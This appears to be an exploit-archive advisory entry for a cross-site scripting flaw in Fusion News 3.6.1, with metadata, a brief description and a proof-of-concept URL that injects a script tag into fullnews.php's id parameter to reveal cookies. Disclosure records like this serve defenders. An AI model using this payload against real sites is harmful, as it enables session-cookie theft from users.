Fusionphp Fusion News 3.6.1 - Cross-Site Scripting

Author: DarkBicho
type: webapps
platform: php
port: 
date_added: 2004-04-23  
date_updated: 2013-01-12  
verified: 1  
codes: OSVDB-5622  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 24046.txt  

source: https://www.securityfocus.com/bid/10203/info

An attacker may be capable of executing arbitrary script code in a browser of a target user and within the context of a visited web site. This may potentially lead to theft of cookie based authentication credentials, other attacks are also possible.

http://www.example.com/fullnews.php?id=<script>alert(document.cookie);</script>